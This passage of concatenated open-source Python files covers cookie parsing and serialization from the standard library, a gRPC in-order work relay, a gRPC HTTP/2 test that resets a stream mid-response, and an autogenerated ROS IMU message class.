# Second we make sure it only contains legal characters
if key.lower() in self._reserved:
raise CookieError("Attempt to set a reserved key: %s" % key)
if any(c not in LegalChars for c in key):
raise CookieError("Illegal key value: %s" % key)
# It's a good key, so save it.
self.key = key
self.value = val
self.coded_value = coded_val
def output(self, attrs=None, header="Set-Cookie:"):
return "%s %s" % (header, self.OutputString(attrs))
__str__ = output
def __repr__(self):
return '<%s: %s=%s>' % (self.__class__.__name__,
self.key, repr(self.value))
def js_output(self, attrs=None):
# Print javascript
return """
<script type="text/javascript">
<!-- begin hiding
document.cookie = \"%s\";
// end hiding -->
</script>
""" % (self.OutputString(attrs).replace('"', r'\"'))
def OutputString(self, attrs=None):
# Build up our result
#
result = []
append = result.append
# First, the key=value pair
append("%s=%s" % (self.key, self.coded_value))
# Now add any defined attributes
if attrs is None:
attrs = self._reserved
items = sorted(self.items())
for key, value in items:
if value == "":
continue
if key not in attrs:
continue
if key == "expires" and isinstance(value, int):
append("%s=%s" % (self._reserved[key], _getdate(value)))
elif key == "max-age" and isinstance(value, int):
append("%s=%d" % (self._reserved[key], value))
elif key == "secure":
append(str(self._reserved[key]))
elif key == "httponly":
append(str(self._reserved[key]))
else:
append("%s=%s" % (self._reserved[key], value))
# Return the result
return _semispacejoin(result)
#
# Pattern for finding cookie
#
# This used to be strict parsing based on the RFC2109 and RFC2068
# specifications. I have since discovered that MSIE 3.0x doesn't
# follow the character rules outlined in those specs. As a
# result, the parsing rules here are less strict.
#
_LegalCharsPatt = r"[\w\d!#%&'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]"
_CookiePattern = re.compile(r"""
(?x) # This is a verbose pattern
(?P<key> # Start of group 'key'
""" + _LegalCharsPatt + r"""+? # Any word of at least one letter
) # End of group 'key'
( # Optional group: there may not be a value.
\s*=\s* # Equal Sign
(?P<val> # Start of group 'val'
"(?:[^\\"]|\\.)*" # Any doublequoted string
| # or
\w{3},\s[\w\d\s-]{9,11}\s[\d:]{8}\sGMT # Special case for "expires" attr
| # or
""" + _LegalCharsPatt + r"""* # Any word or empty string
) # End of group 'val'
)? # End of optional value group
\s* # Any number of spaces.
(\s+|;|$) # Ending either at space, semicolon, or EOS.
""", re.ASCII) # May be removed if safe.
# At long last, here is the cookie class. Using this class is almost just like
# using a dictionary. See this module's docstring for example usage.
#
class BaseCookie(dict):
"""A container class for a set of Morsels."""
def value_decode(self, val):
"""real_value, coded_value = value_decode(STRING)
Called prior to setting a cookie's value from the network
representation. The VALUE is the value read from HTTP
header.
Override this function to modify the behavior of cookies.
"""
return val, val
def value_encode(self, val):
"""real_value, coded_value = value_encode(VALUE)
Called prior to setting a cookie's value from the dictionary
representation. The VALUE is the value being assigned.
Override this function to modify the behavior of cookies.
"""
strval = str(val)
return strval, strval
def __init__(self, input=None):
if input:
self.load(input)
def __set(self, key, real_value, coded_value):
"""Private method for setting a cookie's value"""
M = self.get(key, Morsel())
M.set(key, real_value, coded_value)
dict.__setitem__(self, key, M)
def __setitem__(self, key, value):
"""Dictionary style assignment."""
rval, cval = self.value_encode(value)
self.__set(key, rval, cval)
def output(self, attrs=None, header="Set-Cookie:", sep="\015\012"):
"""Return a string suitable for HTTP."""
result = []
items = sorted(self.items())
for key, value in items:
result.append(value.output(attrs, header))
return sep.join(result)
__str__ = output
def __repr__(self):
l = []
items = sorted(self.items())
for key, value in items:
l.append('%s=%s' % (key, repr(value.value)))
return '<%s: %s>' % (self.__class__.__name__, _spacejoin(l))
def js_output(self, attrs=None):
"""Return a string suitable for JavaScript."""
result = []
items = sorted(self.items())
for key, value in items:
result.append(value.js_output(attrs))
return _nulljoin(result)
def load(self, rawdata):
"""Load cookies from a string (presumably HTTP_COOKIE) or
from a dictionary. Loading cookies from a dictionary 'd'
is equivalent to calling:
map(Cookie.__setitem__, d.keys(), d.values())
"""
if isinstance(rawdata, str):
self.__parse_string(rawdata)
else:
# self.update() wouldn't call our custom __setitem__
for key, value in rawdata.items():
self[key] = value
return
def __parse_string(self, str, patt=_CookiePattern):
i = 0 # Our starting point
n = len(str) # Length of string
M = None # current morsel
while 0 <= i < n:
# Start looking for a cookie
match = patt.search(str, i)
if not match:
# No more cookies
break
key, value = match.group("key"), match.group("val")
i = match.end(0)
# Parse the key, value in case it's metainfo
if key[0] == "$":
# We ignore attributes which pertain to the cookie
# mechanism as a whole. See RFC 2109.
# (Does anyone care?)
if M:
M[key[1:]] = value
elif key.lower() in Morsel._reserved:
if M:
if value is None:
if key.lower() in Morsel._flags:
M[key] = True
else:
M[key] = _unquote(value)
elif value is not None:
rval, cval = self.value_decode(value)
self.__set(key, rval, cval)
M = self[key]
class SimpleCookie(BaseCookie):
"""
SimpleCookie supports strings as cookie values. When setting
the value using the dictionary assignment notation, SimpleCookie
calls the builtin str() to convert the value to a string. Values
received from HTTP are kept as strings.
"""
def value_decode(self, val):
return _unquote(val), val
def value_encode(self, val):
strval = str(val)
return strval, _quote(strval)
| gpl-2.0 |
madongfly/grpc | src/python/grpcio/grpc/framework/foundation/relay.py | 23 | 5651 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Implementations of in-order work deference."""
import abc
import enum
import threading
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
_NULL_BEHAVIOR = lambda unused_value: None
class Relay(object):
"""Performs work submitted to it in another thread.
Performs work in the order in which work was submitted to it; otherwise there
would be no reason to use an implementation of this interface instead of a
thread pool.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def add_value(self, value):
"""Adds a value to be passed to the behavior registered with this Relay.
Args:
value: A value that will be passed to a call made in another thread to the
behavior registered with this Relay.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_behavior(self, behavior):
"""Sets the behavior that this Relay should call when passed values.
Args:
behavior: The behavior that this Relay should call in another thread when
passed a value, or None to have passed values ignored.
"""
raise NotImplementedError()
class _PoolRelay(activated.Activated, Relay):
@enum.unique
class _State(enum.Enum):
INACTIVE = 'inactive'
IDLE = 'idle'
SPINNING = 'spinning'
def __init__(self, pool, behavior):
self._condition = threading.Condition()
self._pool = pool
self._own_pool = pool is None
self._state = _PoolRelay._State.INACTIVE
self._activated = False
self._spinning = False
self._values = []
self._behavior = _NULL_BEHAVIOR if behavior is None else behavior
def _spin(self, behavior, value):
while True:
behavior(value)
with self._condition:
if self._values:
value = self._values.pop(0)
behavior = self._behavior
else:
self._state = _PoolRelay._State.IDLE
self._condition.notify_all()
break
def add_value(self, value):
with self._condition:
if self._state is _PoolRelay._State.INACTIVE:
raise ValueError('add_value not valid on inactive Relay!')
elif self._state is _PoolRelay._State.IDLE:
self._pool.submit(self._spin, self._behavior, value)
self._state = _PoolRelay._State.SPINNING
else:
self._values.append(value)
def set_behavior(self, behavior):
with self._condition:
self._behavior = _NULL_BEHAVIOR if behavior is None else behavior
def _start(self):
with self._condition:
self._state = _PoolRelay._State.IDLE
if self._own_pool:
self._pool = logging_pool.pool(1)
return self
def _stop(self):
with self._condition:
while self._state is _PoolRelay._State.SPINNING:
self._condition.wait()
if self._own_pool:
self._pool.shutdown(wait=True)
self._state = _PoolRelay._State.INACTIVE
def __enter__(self):
return self._start()
def __exit__(self, exc_type, exc_val, exc_tb):
self._stop()
return False
def start(self):
return self._start()
def stop(self):
self._stop()
def relay(behavior):
"""Creates a Relay.
Args:
behavior: The behavior to be called by the created Relay, or None to have
passed values dropped until a different behavior is given to the returned
Relay later.
Returns:
An object that is both an activated.Activated and a Relay. The object is
only valid for use as a Relay when activated.
"""
return _PoolRelay(None, behavior)
def pool_relay(pool, behavior):
"""Creates a Relay that uses a given thread pool.
This object will make use of at most one thread in the given pool.
Args:
pool: A futures.ThreadPoolExecutor for use by the created Relay.
behavior: The behavior to be called by the created Relay, or None to have
passed values dropped until a different behavior is given to the returned
Relay later.
Returns:
An object that is both an activated.Activated and a Relay. The object is
only valid for use as a Relay when activated.
"""
return _PoolRelay(pool, behavior)
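# --- Hedged usage sketch, not part of the original module ---
# A Relay must be activated before values may be added; the context manager
# form below activates it and, on exit, waits for the relay to drain, so the
# deque ends up holding the values in submission order.
if __name__ == '__main__':
  import collections
  _seen = collections.deque()
  with relay(_seen.append) as _in_order_relay:
    for _value in range(5):
      _in_order_relay.add_value(_value)
  assert list(_seen) == [0, 1, 2, 3, 4]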
| bsd-3-clause |
MakMukhi/grpc | test/http2_test/test_rst_during_data.py | 26 | 2707 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import http2_base_server
class TestcaseRstStreamDuringData(object):
"""
In response to an incoming request, this test sends headers, followed by
some data, followed by a reset stream frame. Client asserts that the RPC
failed and does not deliver the message to the application.
"""
def __init__(self):
self._base_server = http2_base_server.H2ProtocolBaseServer()
self._base_server._handlers['DataReceived'] = self.on_data_received
self._base_server._handlers['SendDone'] = self.on_send_done
def get_base_server(self):
return self._base_server
def on_data_received(self, event):
self._base_server.on_data_received_default(event)
sr = self._base_server.parse_received_data(event.stream_id)
if sr:
response_data = self._base_server.default_response_data(sr.response_size)
self._ready_to_send = True
response_len = len(response_data)
truncated_response_data = response_data[0:response_len/2]
self._base_server.setup_send(truncated_response_data, event.stream_id)
def on_send_done(self, stream_id):
self._base_server.send_reset_stream()
self._base_server._stream_status[stream_id] = False
| bsd-3-clause |
JackieJ/UCLA-robomagellan-2011 | glados_sensors/src/glados_sensors/msg/_imu.py | 2 | 3254 | """autogenerated by genmsg_py from imu.msg. Do not edit."""
import roslib.message
import struct
class imu(roslib.message.Message):
_md5sum = "4ed31225b8988ef9b0cd0b234eb0aa9b"
_type = "glados_sensors/imu"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float32 bearing
float32 gx
float32 gy
"""
__slots__ = ['bearing','gx','gy']
_slot_types = ['float32','float32','float32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommended
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
bearing,gx,gy
@param args: complete set of field values, in .msg order
@param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(imu, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.bearing is None:
self.bearing = 0.
if self.gx is None:
self.gx = 0.
if self.gy is None:
self.gy = 0.
else:
self.bearing = 0.
self.gx = 0.
self.gy = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
@param buff: buffer
@type buff: StringIO
"""
try:
_x = self
buff.write(_struct_3f.pack(_x.bearing, _x.gx, _x.gy))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
@param str: byte array of serialized message
@type str: str
"""
try:
end = 0
_x = self
start = end
end += 12
(_x.bearing, _x.gx, _x.gy,) = _struct_3f.unpack(str[start:end])
return self
except struct.error as e:
raise roslib.message.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
@param buff: buffer
@type buff: StringIO
@param numpy: numpy python module
@type numpy: module
"""
try:
_x = self
buff.write(_struct_3f.pack(_x.bearing, _x.gx, _x.gy))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
@param str: byte array of serialized message
@type str: str
@param numpy: numpy python module
@type numpy: module
"""
try:
end = 0
_x = self
start = end
end += 12
(_x.bearing, _x.gx, _x.gy,) = _struct_3f.unpack(str[start:end])
return self
except struct.error as e:
raise roslib.message.DeserializationError(e) #most likely buffer underfill
_struct_I = roslib.message.struct_I
_struct_3f = struct.Struct("<3f")
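# Hedged usage sketch (not part of the generated file); it assumes a ROS
# Python 2 environment where roslib.message is importable:
#   from cStringIO import StringIO
#   msg = imu(bearing=90.0, gx=0.1, gy=-0.2)
#   buff = StringIO()
#   msg.serialize(buff)
#   copy = imu().deserialize(buff.getvalue())  # copy.bearing == 90.0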
| gpl-2.0 |